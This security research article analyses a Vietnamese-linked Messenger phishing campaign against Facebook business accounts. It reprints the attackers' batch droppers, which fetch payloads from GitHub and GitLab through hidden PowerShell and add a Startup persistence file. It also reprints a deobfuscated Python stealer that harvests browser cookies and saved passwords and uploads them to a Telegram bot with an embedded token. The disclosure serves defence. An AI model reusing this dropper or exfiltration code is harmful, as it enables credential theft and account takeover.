“mrtonyscam” — botnet Of Facebook Users Launch High-intent Messenger Phishing Attack On Business…

“MrTonyScam” — Botnet of Facebook Users Launch High-Intent Messenger Phishing Attack on Business Accounts

By Oleg Zaytsev (Guardio Labs)

Facebook’s Messenger platform has been heavily abused in the past month to spread endless messages with malicious attachments from a swarm of fake and hijacked personal accounts. These threat actors are targeting millions of business accounts on Facebook’s platform — from highly-rated marketplace sellers to large corporations, with fake business inquiries, achieving a staggering “success rate” with approximately 1 out of 70 infected!

Originating yet again from a Vietnamese-based group, this campaign uses a tiny compressed file attachment that packs a powerful Python-based stealer dropped in a multi-stage process full of simple yet effective obfuscation methods.

In this write-up, we will share our analysis of this campaign, including how it appears from the victim’s perspective as well as the the threat actor’s ecosystem of dark markets. All of this will illustrate how this operation, along with its robust underground marketplace supply and demand, manages to compromise so many businesses on one of the world’s most popular platforms.

Phishing Facebook Business Accounts

Receiving an instant message from someone you don’t know is usually an intriguing event, especially if this is a new business opportunity. This is exactly what this phishing method is all about — luring business owners to click on the malicious attachment, ultimately giving away their entire Facebook operation, and getting locked out for good!

Different variants of Facebook messenger phishing messages sent to businesses

Facebook Accounts with reputation, seller rating, and high number of followers can be easily monetized on dark markets. Those are used to reach a broad audience to spread advertisements as well as more scams. Additionally, individuals who own Facebook business accounts are likely to have other highly valuable accounts on other platforms such as banking, e-commerce, ad platforms, and much more — all available to grab directly from their browser’s cookies and password files. This makes them the ideal target for scammers.

A Complex Yet Familiar Attack Flow

The attack flow is a combination of techniques, free/open platform abuse as well as numerous obfuscation and hiding methods — summing to a quite complex flow. Some of those techniques we’ve come to see in other campaigns we’ve uncovered in the past like “Malverposting”, and also here all signs show the involvement of Vietnamese-originated threat actor groups:

Attack flow from Messenger phishing to exfiltrating stolen data with Telegram/Discord

As depicted above, the attack starts with messages sent in masses to business accounts via Messenger, followed by a malicious stealer payload targeting all victims’ installed browsers and ending up with stolen session cookies sent to threat actors' IM channels. A swift and effective operation.

Abusing Facebook’s Messenger

The contents of these messages vary, but they all seem to share the same context. Some messages may be complaints addressing the page for violating policies, while others may be questions related to a product that is likely advertised by the business account.

Each message is sent with different variations on the message and topic, different filenames as well as adding Unicode characters to different words — all to make each message unique and avoid spammers detection. Indeed those messages are entering the Facebook business suite Inbox with ease:

Example of a BM inbox showing a phishing message including malicious attachment

The Payload — Small But Deadly

The payload is archived with RAR or ZIP formats, and we managed to find several variants, each containing a single file inside — a Windows batch script:

Double-clicking on the attachments will show their content in the Explorer window

This batch script acts as the Stage I Dropper, prepping your system for the real payload. It downloads yet another zip file, usually hosted on a free code hosting platform such as GitHub or GitLab — as can be seen in this sample:

@echo off
set URL=https://github[.]com/xjnhzaj12b1/iscsicpl_bypassUAC/raw/main/4duong2.zip
set ZIP_PATH=C:UsersPublicmyFile.zip
curl -L -o "%ZIP_PATH%" "%URL%"
powershell -command "Expand-Archive -LiteralPath '%ZIP_PATH%' -DestinationPath '%DESTINATION_FOLDER%'"
del "%ZIP_PATH%"

The extracted zip file contains another batch script file vn.cmd, which is directly executed, acting as the Stage II Dropper. When we examine this script, we first reveal the following mysterious view:

At first glance, it doesn’t seem like something that can be executed. The answer lies in the encoding. Text editors assume that the file is UTF-16LE encoded, while in reality, most of the characters are ASCII encoded as usual and only the first couple of characters (and the last one) are of some other encoding. This is a clever trick to hide the contents of a batch file from nosy analysts and especially automated scanners.

What makes this seemingly corrupted script work is the fact that batch scripts are executed line by line. Even though the first line is corrupted in this case, the remaining lines will still be executed. After changing the encoding, we reveal the entire script:

@echo off
set dQ=u
set UA=P
setlocal EnableDelayedExpansion
set Og=:
set Uw=S
set dw=w
set XQ=]
set XA=
start chrome https://www.alibaba.com/
C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/xjnhzaj12b2/home/-/raw/master/st -OutFile "C:Users$([Environment]::UserName)AppDataRoamingMicrosoftWindows'Start Menu'ProgramsStartupWindowsSecure.bat";
C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/xjnhzaj12b2/home/-/raw/master/Document.zip -OutFile C:UsersPublicDocument.zip;
C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden Expand-Archive C:UsersPublicDocument.zip -DestinationPath C:UsersPublicDocument;
C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/xjnhzaj12b2/home/-/raw/master/achung3 -OutFile C:UsersPublicDocumentproject.py;
C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden C:UsersPublicDocumentpython C:UsersPublicDocumentproject.py;
start chrome https://www.alibaba.com/

It starts with tons of harmless and redundant set commands, just to fill it up with benign code. Following that, the actual malicious part starts. The batch script executes Chrome pointing it to the Alibaba website. Why? Well, why not? Great prices. Yet, this is just a distraction of course. Then, it pulls some additional resources from the same Github repository as before and performs three main tasks:

  1. Creates a standalone Python environment by unpacking Documents.zip
  2. Pulls the main stealer functionality — project.py
  3. Executes the main stealer using the Python env.
  4. Adds persistence in the form of the WindowsSecure.bat file that executes the stealer on every startup.

5 Shades Of Obfuscation

The malicious payload in the form of the project.py script uses 5 layers of obfuscation to hide its content and generate it on the fly to avoid static detection:

.unhexlify(b"789c01e61419eb425a68393141592653...[VERY LONG STRING]...9e5")))))))

The code is masked as an ASCII string, compresses with zlib bz2 and gzip, and lastly with lzma. Only after reversing this flow, we reveal the actual malicious payload (some functions and code are omitted in this example):

fud = base64.b64decode("LTk2MjEyNDk0OA==").decode('utf-8')
crypt = base64.b64decode("aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdDYzNzkwNDY3ODc6QUFGNmZfdTE4dXN1b01rcllqUUZtZWoyblNfODA1WE5NdE0vc2VuZERvY3VtZW50").decode('utf-8')

def check_chrome_running():
def find_profile(path_userdata):
def get_chrome(data_path,chrome_path):
def get_edge(data_path,edge_path):
def get_brave(data_path,brave_path):
def get_opera(data_path,opera_path):
def get_coccoc(data_path,coccoc_path):
def get_chromium(data_path,chromium_path):
def find_profile_firefox(firefox_path):
def get_firefox(data_path,firefox_path):
def encrypt(data_profile):
def getKey(afk):
def encrypt_firefox(path_f):
def delete_firefox(data_firefox_profile):
def delete_file(data_profile):
def delete_firefox(data_firefox_profile):
def decryptMoz3DES( globalSalt, entrySalt, encryptedData ):
def decodeLoginData(data):
def getLoginData(afkk):
def decryptPBE(decodedItem, globalSalt): #PBE pour Password Based Encryption
def delete_file(data_profile):
def Compressed(z_ph,number):
def demso() :
def id() :

def main():
number = "Thu Spam lần thứ " + str(demso())
data_path = os.path.join(os.environ["TEMP"], name_f);os.mkdir(data_path)
chrome = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data")
firefox = os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming","Mozilla", "Firefox", "Profiles")
Edge = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Microsoft", "Edge", "User Data")
Opera = os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Opera Software", "Opera Stable")
Brave = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","BraveSoftware", "Brave-Browser", "User Data")
coccoc = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","CocCoc", "Browser", "User Data")
chromium = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","Chromium", "User Data")
python310_path = r'C:UsersPublicDocument.zip'
z_ph = os.path.join(os.environ["TEMP"], name_f +'.zip');shutil.make_archive(z_ph[:-4], 'zip', data_path)
token = 'https://api[.]telegram[.]org/bot6186662136:AAGyzxWQ0OzgVZdDQyd0pDEHRJZU_GpMEiA/sendDocument';IDchat = '-921942879'
with open(z_ph, 'rb') as f:
x01.post(token,data={'caption':"ID:"+id()+" nIP:"+ip+" n"+number,'chat_id':IDchat},files={'document': f})
shutil.rmtree(os.environ["TEMP"], name_f +'.zip');shutil.rmtree(os.environ["TEMP"], name_f)

A simple straightforward Python script that extracts all cookies and login data (saved usernames and passwords) from several popular browsers it looks for on the victim’s computer. All this together is sent to a telegram channel using Telegram’s/Discord bot API which is a common practice among scammers. In other words — this is a classic stealer.

One last bonus in this case is that the script actually deletes all cookies after stealing them. This locks the victim out of her/his accounts, giving the scammers time to hijack their session and replace the password — so the victims won’t be able to revoke the stolen session or change the password themselves.

Vietnamese Threat Actor’s Fingerprints

This python stealer reveals the Vietnamese origin of these threat actors. The message “Thu Spam lần thứ” which is sent to the Telegram bot appended with a counter of execution time, translates from Vietnamese as “Collect Spam for the X time”. The second indication is the inclusion of “Coc Coc” browser — a popular browser among Vietnamese.

These attackers left us the Telegram/Discord API tokens of their bots so we could learn a little bit about them. In the above variant, the bot’s username is “AChung8668_BOT”. The stealer was sending messages to a channel named “ACHUNG — 21/8 — ❤️❤️❤️”. The administrator of this channel, who is probably one of those behind this attack is calling himself “MrTonyName”. Later, we found a couple of other telegram bots which all led to the same username.

One of the Telegram bots used to exfiltrate stolen data

The Dark Markets are Thriving

A quick glimpse into the Dark Markets on Telegram reveals how these threat actors monetize their efforts — and how thriving and brutal this “Market” is. We see numerous channels and users offering everything from specific high-value accounts to “logs” of hundreds and thousands of hijacked business accounts (BM — Business Manager), advertisement accounts with reputation, or even linked payment methods and credits (Agency Accounts):

Telegram messages advertising stolen Facebook advertisement accounts for sale
More Telegram messages advertising stolen Facebook verified business accounts for sale

You can buy those directly from Telegram, or go to dedicated marketplaces like the following example — freely accessible, with no need for Tor/Onion-based browsers. See prices, get samples, and 24/7 support:

A marketplace for stolen Facebook business accounts

Here you even get specific tutorials on how to quickly log in to the stolen accounts and change the password without alarming Facebook’s protection checkpoints. The sites are in Vietnamese, offering a poor (possibly automated) translation to English as can be seen here:

Tutorial for how to use stolen session cookies to hijack accounts

Alarming Stats and Conclusions

Although this phishing campaign doesn’t use the most efficient of techniques and requires victims to actually download a file, unzip, and execute it, our analysis reveals the estimated stats of infections to be quite alarming!

In the following funnel diagram, we see the estimated “Conversion Rate” of this campaign in the past 30 days. If we consider the entire spectrum of Facebook business accounts, we see that at least 7% of those received phishing messages. We see that around 0.4% have actually downloaded the attachment → 1 out of 250 victims is infected!

Funnel diagram approximating 1 of 250 accounts infected worldwide

Note that the attachment did not trigger any end-point or Anti-Virus protection, and even on VT only some of the samples get hardly 2 detections at the time of writing these lines. With this, and the realization that victims downloaded the file with intent, we can only assume the final number of compromised accounts to be high and alarming!

The threat actors hold an army of bots and fake Facebook accounts as well as a listing of millions of business accounts, pages, and managers — sending away over +100k phishing messages a week to Facebook users around the world:

Campaign distribution worldwide in the past 30 days

This is yet another vibrant example of what we here at Guardio refer to as The Security Gap. Threat actors will always find new ways to get to us, hijack social accounts, and abuse legitimate services for their malicious deeds. We see here the security loopholes in our modern browsers that hold easily decrypted passwords and still hold easily accessible cookies and security tokens. We see how social services like Facebook and others still fail to detect account hijacking in real time (not that it’s easy, and yet…) and also how the eco-system of this dark market is thriving and attracts more and more threat actors to get a piece of the pie.

It’s important to be as vigilant as possible, and be ready to use more layers of security detection — you can never know where the next punch will come from.


Malicious Code Hosting Git Repos:


Filename Samples:

File Hashes Samples:

Source: Original Post